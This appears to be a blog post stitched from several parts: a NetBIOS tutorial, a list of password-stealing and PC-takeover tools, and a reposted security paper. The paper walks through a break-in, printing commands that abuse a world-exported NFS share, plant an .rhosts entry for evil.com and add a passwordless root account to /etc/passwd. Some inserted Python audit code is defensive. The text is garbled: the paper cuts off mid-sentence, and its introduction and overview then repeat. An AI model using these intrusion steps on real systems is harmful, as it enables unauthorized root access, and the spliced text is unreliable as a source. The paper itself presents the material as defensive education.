I bet you want to try your hand at ethical hacking but are unaware of basic NetBIOS, which is a very important aspect of it. This is the best explanation I can offer you, written in much simpler language.
~cheers~
Preface to NetBIOS
Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.
What is NetBIOS?
NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.
NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.
It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependencies. It also spares software developers the task of developing network error recovery and low-level message addressing or routing. The NetBIOS interface does a lot of this work for them.
NetBIOS standardizes the interface between applications and a LAN's operating capabilities. With this, it can be specified to which levels of the OSI model the application can write, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.
PCs on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.
All communication in these environments is presented to NetBIOS in a format called a Network Control Block (NCB). The allocation of these blocks in memory is dependent on the user program. Each NCB is divided into fields, which are reserved for input and output respectively.
NetBIOS is a very common protocol used in today's environments. NetBIOS is supported on Ethernet, Token Ring, and IBM PC Networks. In its original form, it was defined only as an interface between the application and the network adapter. Since then, transport-like functions have been added to NetBIOS, making it more functional over time.
In NetBIOS, both connection-oriented (TCP) and connectionless (UDP) communication are supported. It supports both broadcasts and multicasting, and supports three distinct services: Naming, Session, and Datagram.
NetBIOS Names
NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.
A NetBIOS name can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source-routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register its NetBIOS name.
When a client becomes active, the client advertises its name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process are as follows:
1. Upon boot-up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 times to ensure every other client on the network receives the information.
2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client that is trying to register the already-in-use name stops all attempts to register that name.
3. If no other client on the network objects to the name registration, the client finishes the registration process.
There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.
The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service.
[QuickNote: SMB and NBT (NetBIOS over TCP/IP) work very closely together and both use ports 137, 138 and 139. Port 137 is NetBIOS name (UDP). Port 138 is NetBIOS datagram (UDP). Port 139 is NetBIOS session (TCP). For further information on NetBIOS, read the paper at the rhino9 website listed above.]
The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.
Name                Number  Type  Usage
==========================================================================
                    00      U     Workstation Service
                    01      U     Messenger Service
<\\_MSBROWSE_>      01      G     Master Browser
                    03      U     Messenger Service
                    06      U     RAS Server Service
                    1F      U     NetDDE Service
                    20      U     File Server Service
                    21      U     RAS Client Service
                    22      U     Exchange Interchange
                    23      U     Exchange Store
                    24      U     Exchange Directory
                    30      U     Modem Sharing Server Service
                    31      U     Modem Sharing Client Service
                    43      U     SMS Client Remote Control
                    44      U     SMS Admin Remote Control Tool
                    45      U     SMS Client Remote Chat
                    46      U     SMS Client Remote Transfer
                    4C      U     DEC Pathworks TCPIP Service
                    52      U     DEC Pathworks TCPIP Service
                    87      U     Exchange MTA
                    6A      U     Exchange IMC
                    BE      U     Network Monitor Agent
                    BF      U     Network Monitor Apps
                    03      U     Messenger Service
                    00      G     Domain Name
                    1B      U     Domain Master Browser
                    1C      G     Domain Controllers
                    1D      U     Master Browser
                    1E      G     Browser Service Elections
                    1C      G     Internet Information Server
                    00      U     Internet Information Server
                    [2B]    U     Lotus Notes Server
IRISMULTICAST       [2F]    G     Lotus Notes
IRISNAMESERVER      [33]    G     Lotus Notes
Forte_$ND800ZA      [20]    U     DCA Irmalan Gateway Service
Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.
Group (G): A normal group; the single name may exist with many IP addresses.
Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.
Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.
Domain Name (D): New in NT 4.0
For a quick and dirty look at a server's registered NetBIOS names and services, issue one of the following NBTSTAT commands:
nbtstat -A [ipaddress]
nbtstat -a [host]
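To make the "15 characters plus a 16th-byte suffix" rule concrete, here is an added Python example (not code from the original tutorial or from rhino9). It builds a Microsoft-style NetBIOS name, applies the RFC 1001 first-level encoding that carries the name inside NetBIOS name-service packets on UDP port 137, and labels the rows of an nbtstat -A name table with the services from the suffix table above. The nbtstat output it parses is a constructed sample shaped like the Windows tool's output, and SUFFIX_TABLE covers only a subset of the table above.

```python
"""NetBIOS names as described above: a 15-character name plus a 1-byte
suffix, the RFC 1001 "first-level" encoding that carries the name on
UDP/137, and a classifier for nbtstat -A style name tables.
Added example for this tutorial; it is not code from the original post."""
import re

# Subset of the suffix table above: (suffix, U/G) -> service it identifies.
SUFFIX_TABLE = {
    (0x00, "U"): "Workstation Service",
    (0x00, "G"): "Domain Name",
    (0x01, "G"): "Master Browser",          # the <\\_MSBROWSE_> group name
    (0x03, "U"): "Messenger Service",
    (0x06, "U"): "RAS Server Service",
    (0x1B, "U"): "Domain Master Browser",
    (0x1C, "G"): "Domain Controllers",
    (0x1D, "U"): "Master Browser",
    (0x1E, "G"): "Browser Service Elections",
    (0x20, "U"): "File Server Service",
    (0x21, "U"): "RAS Client Service",
}


def netbios_name(name, suffix):
    """Build the 16-byte name: Microsoft uses 15 characters (upper-cased,
    space padded) and puts the service suffix in the 16th byte."""
    if not 1 <= len(name) <= 15:
        raise ValueError("Microsoft NetBIOS names are 1 to 15 characters")
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must fit in one byte")
    return name.upper().ljust(15).encode("ascii") + bytes([suffix])


def first_level_encode(raw):
    """RFC 1001 first-level encoding: every byte becomes two letters in
    A..P (high nibble, then low nibble, each added to 'A'), 32 chars total."""
    if len(raw) != 16:
        raise ValueError("expected a 16-byte NetBIOS name")
    out = []
    for b in raw:
        out.append(chr((b >> 4) + ord("A")))
        out.append(chr((b & 0x0F) + ord("A")))
    return "".join(out)


def first_level_decode(encoded):
    """Inverse of first_level_encode; returns (name, suffix)."""
    if len(encoded) != 32 or any(not "A" <= c <= "P" for c in encoded):
        raise ValueError("malformed first-level encoded name")
    nibbles = [ord(c) - ord("A") for c in encoded]
    raw = bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


# One nbtstat name-table row: name, <suffix>, UNIQUE|GROUP, status.  The
# name may run straight into the "<", as "..__MSBROWSE__.<01>" does.
NBTSTAT_ROW = re.compile(
    r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")


def classify_nbtstat(output):
    """Parse the name table printed by `nbtstat -A <ip>` and label each
    entry with the service its 16th-byte suffix identifies."""
    entries = []
    for line in output.splitlines():
        m = NBTSTAT_ROW.match(line)
        if not m:
            continue
        name, suffix_hex, ntype, status = m.groups()
        key = (int(suffix_hex, 16), "U" if ntype == "UNIQUE" else "G")
        entries.append({
            "name": name,
            "suffix": key[0],
            "type": key[1],
            "usage": SUFFIX_TABLE.get(key, "unknown suffix"),
            "status": status,
        })
    return entries


def domain_controllers(entries):
    """Names registered with the <1C> group suffix, i.e. domain controllers."""
    return sorted({e["name"] for e in entries
                   if e["suffix"] == 0x1C and e["type"] == "G"})


# Constructed sample shaped like nbtstat -A output; not a real capture.
SAMPLE_NBTSTAT = """\
NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    FILESRV01      <00>  UNIQUE      Registered
    FILESRV01      <20>  UNIQUE      Registered
    CORPDOM        <00>  GROUP       Registered
    CORPDOM        <1C>  GROUP       Registered
    CORPDOM        <1B>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
"""

if __name__ == "__main__":
    for e in classify_nbtstat(SAMPLE_NBTSTAT):
        print(f"{e['name']:<16} <{e['suffix']:02X}> {e['type']}  {e['usage']}")
    print("wire form of FILESRV01<20>:",
          first_level_encode(netbios_name("FILESRV01", 0x20)))
```

Run defensively over a sweep of your own address space, the same classification shows which hosts advertise the <20> file server name and which group names carry the <1C> domain controller suffix to anyone who can reach UDP port 137; those are exactly the names worth keeping unreachable from untrusted networks.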
NetBIOS Sessions
The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands then transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.
NetBIOS Datagrams
Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.
The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.
NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, NetBIOS has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.
Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name-to-address resolution by using either broadcasts or LMHOSTS files. In a Microsoft environment, you would probably also use a NetBIOS Name Server, known as WINS.
NetBEUI Explained
NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. It is the transport-layer driver frequently used by Microsoft's LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LAN Manager server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher-level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.
NetBIOS Scopes
A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer name as long as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.
Hackers' tools: a reference! BEWARE!!
AAh!!
The following tools I am going to list now are some of the dangerous tools available on the web, which may be used on you by an unethical hacker. I want you to be well aware of all the possibilities.
They are free to download and it takes seconds to crush a personal computer if it is wired online. I am not disclosing the links to these tools.
Lord PS
Lord PS is an editor that will create a password stealer/virus that emails you the passwords, with tons of options; options may include taking over your entire PC and disallowing you from accessing any of the files.
Hosein PS v1.6
Does the same job as the above with fewer options/features; another Yahoo password stealer.
Fucker PS
This is a strong multi-password stealer that will grab passwords from all the most commonly used programs/services (MSN, Yahoo, etc.).
JPS v1.8
Another password grabber/stealer and e-mailer that is more focused on Yahoo Messenger.
Demon PS v2.3
Yahoo Messenger password stealer/mailer with anti-virus kill options and other system features.
Tro messenger
The big boss; used with Yahoo Messenger, it lets you take over the victim's PC.
Many more exist; I will be disclosing all of them.
Even you can contribute.
ABOUT ME
- SAINATH GUPTA
- Entrepreneur, Student at IIIT, Geek & Blogger. I am a person who loves to make loads of friends.. well, that's my favorite hobby! I always look forward to making new friends, equally valuing the old ones; do feel free to say hi :)
Improving the Security of Your Site by Breaking Into it
Introduction
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that aren't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescence of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.
The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.
The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice --
one of our goals is to show just how dangerous it can be to ignore basic
security practices.
Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.
While exploring the methods and strategies discussed in this paper we
wrote SATAN (Security Analysis Tool for Auditing Networks). Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws -- usually in the form of incorrectly setup or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn't use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.
Note that it isn't possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won't cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don't
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim's keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.
Gaining Information
-------------------
Let us assume that you are the head system administrator of Victim
Incorporated's network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system's security from the outside.
What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don't stop
there -- you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
-- information is power -- but for now we'll examine only our intended
target.
To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):
victim % finger @victim.com
[victim.com]
Login Name TTY Idle When Where
zen Dr. Fubar co 1d Wed 08:00 death.com
Good! A single idle user -- it is likely that no one will notice if you
actually manage to break in.
Now you try more tactics. As every finger devotee knows, fingering "@",
"0", and "", as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.
To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.
Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:
Login Home-dir Shell Last login, from where
----- -------- ----- ----------------------
root / /bin/sh Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin /bin Never logged in
nobody / Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon / Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync / /bin/sync Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen /home/zen /bin/bash On since Wed Nov 6 on ttyp3 from death.com
sam /home/sam /bin/csh Wed Nov 5 05:33 on ttyp3 from evil.com
guest /export/foo /bin/sh Never logged in
ftp /home/ftp Never logged in
Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.
For instance, running showmount on your target reveals:
evil % showmount -e victim.com
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
Note that /export/foo is exported to the world; also note that this is
user guest's home directory. Time for your first break-in! In this
case, you'll mount the home directory of user "guest." Since you don't
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a "guest" account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.
evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 10001 daemon 1024 Aug 3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root daemon 512 Jun 19 09:47 .
1 drwxr-xr-x 7 root wheel 512 Jul 19 1991 ..
1 drwx--x--x 9 guest daemon 1024 Aug 3 15:49 guest
evil # su guest
evil % echo evil.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %
If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.
We suggest that filesystems be exported:
o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
If the target has a "+" wildcard in its /etc/hosts.equiv (the default in
various vendor's machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target's password
file can rlogin to the target without a password. And since the user
"bin" often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:
evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #
A few notes about the method used above; "rsh victim.com
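The two weaknesses exercised in the walk-through above, a filesystem exported to everyone and a "+" wildcard in /etc/hosts.equiv, are both visible in plain text that an administrator can audit before an intruder does. The following Python is an added example (not code from the paper and not part of SATAN): it parses `showmount -e` output to list world-mountable exports, and scans hosts.equiv contents for wildcard host and user entries and "+@netgroup" trust. Both inputs are constructed samples in the shape of the output shown above; the netgroups bug from CERT advisory 91:12 is out of scope for this check.

```python
"""Audit helpers for two of the weaknesses exercised above: NFS
filesystems exported to the world (as seen with showmount -e) and the
"+" wildcard in /etc/hosts.equiv.  Added example; it is not code from
the paper and not part of SATAN."""


def parse_showmount(output):
    """Parse `showmount -e host` output into {export_path: [clients]}.
    The client column is free text: "(everyone)" or host/netgroup names."""
    exports = {}
    for line in output.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue                      # "export list for ..." header or junk
        exports[parts[0]] = [c.strip(",") for c in parts[1:]]
    return exports


def world_exports(exports):
    """Export paths any client may mount: the condition that let the
    walk-through above mount /export/foo and plant a .rhosts file."""
    return sorted(path for path, clients in exports.items()
                  if any(c in ("(everyone)", "*") for c in clients))


def hosts_equiv_findings(content):
    """Flag risky /etc/hosts.equiv lines.  Each line is "host [user]"; a
    host of "+" trusts every host, a user of "+" trusts every user on that
    host, and "+@netgroup" trusts every member of a netgroup.  Returns a
    list of (line_number, raw_line, reason)."""
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+":
            findings.append((lineno, raw, "wildcard host: any host is trusted "
                             "for every non-root name in the password file"))
        elif host.startswith("+@"):
            findings.append((lineno, raw,
                             "trusts every host in netgroup " + host[2:]))
        if user == "+":
            findings.append((lineno, raw,
                             "wildcard user: any remote user is trusted"))
    return findings


# Constructed samples in the shape of the walk-through's output.
SAMPLE_SHOWMOUNT = """\
export list for victim.com:
/export (everyone)
/var (everyone)
/usr easy
/export/root/easy easy
"""

SAMPLE_HOSTS_EQUIV = """\
# constructed /etc/hosts.equiv for the example
big.victim.com
+
evil.com +
+@trusted
"""

if __name__ == "__main__":
    for path in world_exports(parse_showmount(SAMPLE_SHOWMOUNT)):
        print(f"world-mountable export: {path}")
    for lineno, raw, reason in hosts_equiv_findings(SAMPLE_HOSTS_EQUIV):
        print(f"hosts.equiv:{lineno}: {raw!r}: {reason}")
```

On a real host, feed the checks the output of `showmount -e localhost` and the contents of /etc/hosts.equiv (and each user's ~/.rhosts, which uses the same "host [user]" format); a world-mountable home directory together with any trusted-host entry is the exact combination the .rhosts trick above relies on.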
------------
Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.
-----
CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley .
Purdue. Sun. You name it, we've seen it broken into. Anything that is
on the Internet (and many that isn't) seems to be fairly easy game. Are
these targets unusual? What happened?
Fade to...
A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescense of the C64's 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless ".mil" site on his
hit list. "guest -- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host off of his
list, and tiredly types in the next potential victim...
This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.
-----
Why "uebercracker"? The idea is stolen, obviously, from Nietzsche's
uebermensch, or, literally translated into English, "over man."
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary -- there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.
Overview
--------
In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.
In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.
Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site -- or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work -- we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.
We want to stress that we will not merely run down a list of bugs or
security holes -- there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way -- one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.
We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people's systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs --
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.
There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.). It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
